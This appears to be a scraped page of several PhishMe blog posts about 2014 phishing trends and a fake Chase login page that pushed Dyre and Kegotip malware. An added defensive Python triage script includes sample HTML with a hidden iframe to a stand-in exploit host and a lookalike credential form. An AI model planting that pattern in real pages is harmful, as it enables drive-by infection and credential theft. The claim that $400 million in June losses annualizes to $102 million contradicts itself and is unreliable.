SC magazine discusses recent research from PhishMe that examined phishing emails with malicious PDF attachments.
Phishing isn’t exactly a new kid on the block. Phishing is one of the most common email-based threats. It is a tried and tested tactic that continues to deliver impressive results for cybercriminals. That’s why phishing continues to grow in popularity. In the month of June 2014 alone, phishing activities totaled $400 million in losses, which could be annualized at $102 million per year.
While it has been around for years, phishing has evolved considerably and has increased in efficiency and effectiveness. In the last six months (as compared to 2013), we’ve seen several differences in the type, size and sophistication of phishing attacks. In this post, we’ll explore the notable differences in the modern phish and discuss new phishing trends that we have seen in 2014 thus far.
#1: There has been an increase in application-targeted attacks.
One of the primary trends that we are seeing in the phishing space is attacks directed at commonly used applications like Google Docs, Gmail or Yahoo. In the past, we saw a lot of big brands being attacked. However, today’s criminals are going after things that are not directly related to the target company. The reason for this is the prevalence of password reuse: while large banks have improved their phishing defenses, personal email accounts provide a channel through which cybercriminals can gain access to individual bank accounts.
This trend is not limited to email programs, however. Considering that financial institutions have increased their defenses, cybercriminals are looking elsewhere and are diversifying their attacks. File sharing websites like Dropbox are major targets, as cybercriminals are able to use bogus links to intercept usernames and passwords. There has also been an increase in attacks targeting industries such as gaming, logistics and travel.
#2: Smaller brands are now being targeted.
While large brands still get a lot of attention, small brands, such as charities, are increasingly on the radar of cybercriminals. Similarly, there are also a lot of university phish. This trend began in 2013, but it has become more prevalent this year. Again, these brands provide a gateway for password reuse that allows cybercriminals to gain access to other things.
Targeted attacks against alumni have also become common in the university space. In most cases, the phisher will attempt to gain control of a university email account in order to reach out to trusted parties (such as boards of directors).
#3: Attack frequency has increased, but size has decreased.
The number of attacks has increased, but the average size of a typical attack has dipped. While those “monster” attacks still exist, most phishing emails are now sent to fewer targets than we saw last year.
#4: Phishing Emails are more believable.
Phishing emails are now much more sophisticated. We’re seeing fewer spelling mistakes and more professionalism in email design, which make the email campaigns much more believable and likely to be successful. Commoditization is driving down prices of phish kits, resulting in a much higher quality presentation.
In summary, each of these trends reflects the fact that cybercriminals are very opportunistic. Today’s cybercriminal is more professional and targeted than ever before. Not only does phishing persist as an attack method, it is increasingly successful.
How does your organization plan to address the rise in phishing activity? Share your comments below.
Most of us are familiar with the common idiom “If it looks like a duck, swims like a duck, quacks like a duck, then it is probably a duck.” Despite criminals’ constant efforts to change their techniques and tactics, this idiom usually holds true for online crime. Phishers have characteristic techniques in just the same way that malware writers and distributors employ specific tactics. These two don’t often overlap.
However, when they do, it makes for a spectacularly effective attack.
This week, PhishMe’s analysts uncovered spam emails distributed by the Cutwail spamming botnet using a new JP Morgan Chase spam template in conjunction with hostile URLs to distribute two samples of the Dyre Trojan and a copy of the Kegotip information stealer malware. This was done with a two-step attack method that first presents victims with a fake login form. At first glance, this webpage resembles a credential phishing page put together by criminals to trick victims into entering their JPMorgan Chase sign-in credentials.
However, a much more insidious attack was taking place as victims visited this page. Loading this page in a Web browser triggers online exploit resources to push a copy of the Upatre malware downloader and execute it on a victim’s machine. This malware was in turn used to obtain the Kegotip malware and one copy of Dyre. If a victim were to enter credentials into the fake sign-in page, he or she would then be presented with the opportunity to download a “Java update” which resulted in an infection involving a second, distinct sample of the Dyre Trojan.
In an interesting twist, the fake sign-in does not actually submit victims’ credentials to any drop point or collection resource, passing instead a single email address hard-coded into the webpage as the login value. Following the completed infection trajectory, seven files were left behind within the infected environment: one compiled Java class, two copies of the Dyre Trojan, one “.db” file associated with the Dyre Trojan, one dropped Upatre executable, one empty .exe file believed to have temporarily contained the original Upatre executable binary, and one Kegotip executable.
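A defender’s triage of a captured lookalike sign-in page, added here as an example and not PhishMe’s code: it flags the traits described above (a form that posts somewhere other than the brand’s domain, a login field whose value is hard-coded, and third-party script or iframe sources that could serve drive-by content). The sample HTML and every hostname in it are constructed placeholders.

```python
# Added example: static triage of a saved phishing page using only the stdlib.
from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_brand(host, brand):
    """True when host is the brand domain itself or a subdomain of it."""
    return host == brand or host.endswith("." + brand)


class PageTriage(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms, self.external, self.cur = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.cur = {"action": a.get("action", ""), "fixed": []}
            self.forms.append(self.cur)
        elif tag == "input" and self.cur is not None:
            # A text/email/hidden field that already carries a value is not
            # collecting anything from the victim (cf. the hard-coded address).
            if a.get("type", "text") in ("text", "email", "hidden") and a.get("value"):
                self.cur["fixed"].append((a.get("name", "?"), a["value"]))
        elif tag in ("script", "iframe") and a.get("src"):
            self.external.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self.cur = None


def triage(html, page_host, brand_domain):
    """Return human-readable findings for one captured page."""
    p = PageTriage()
    p.feed(html)
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or page_host
        if not _is_brand(host, brand_domain):
            findings.append(f"form posts to {host}, not {brand_domain}")
        for name, val in f["fixed"]:
            findings.append(f"field {name} hard-coded to {val}")
    for src in p.external:
        host = urlparse(src).hostname
        if host and host != page_host and not _is_brand(host, brand_domain):
            findings.append(f"third-party resource loaded from {host}")
    return findings


# Constructed sample (placeholder hosts, not the real campaign page).
SAMPLE = """<html><body>
<iframe src="http://exploit-host.example/gate.php" width=0 height=0></iframe>
<form action="http://login-chase.example/post.php" method="post">
<input type="hidden" name="user" value="someone@example.com">
<input type="password" name="pass"><input type="submit" value="Sign in">
</form></body></html>"""

if __name__ == "__main__":
    for line in triage(SAMPLE, "login-chase.example", "chase.com"):
        print(line)
```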
Earlier this week, we discussed how 2014 has seen an evolution in the sophistication of the modern cybercriminal. This malware, posing as a phish, is no exception. The ability to catch these types of instances early makes threat intelligence a must-have.
After some additional thought on this topic, we were reminded of the Verizon Breach Report, which stated that while only 8% of your employees will enter credentials on a phishing page, 18% would visit the page, thinking they would be smart enough to know whether it was real or not once they got there.
In this case, the employee would still be infected by the malware by simply visiting the page.
It’s about the time of year when people should be receiving tax refunds from the IRS, which gives attackers a great opportunity to craft phishing emails. PhishMe users recently reported a round of phishing emails purporting to be from the IRS about tax refunds:
The results are in… and we have a winner! After much deliberation among our panel, we’re pleased to announce Gareth Stanyon as our 2nd Annual Phish Throwdown winner. Gareth’s email “Corporate Information Security Breach” addressed a recipient who supposedly violated company policy regarding social media use. To respond to the allegations, the email directs the recipient to click on a link. The email is personalized with the recipient’s name, organization, and department.
Black Hat USA 2014 – Las Vegas, NV – August 05, 2014 – PhishMe® Inc., the leading provider of threat management for organizations concerned about human susceptibility to advanced targeted attacks, today announced record growth for the first half of 2014, with strong bookings growth of over 95 percent for the same period a year ago, in 2013. PhishMe has also experienced healthy demand from enterprises with one-third of the Fortune 100 now adopting PhishMe’s solutions.
Using tiny URLs to redirect users to phishing and malware domains is nothing new, but just because it’s a common delivery tactic doesn’t mean that attackers aren’t using it to deliver new malware samples. We recently received a report of a phishing email from one of our users here at PhishMe that employed a shortened Google URL and led to some surprising malware.
Through the power of user reporting, we received the report, discovered the malicious nature of the shortened URL, and reported the issue to Google – all within a span of 30 minutes. Google reacted quickly and took the link down shortly after our report.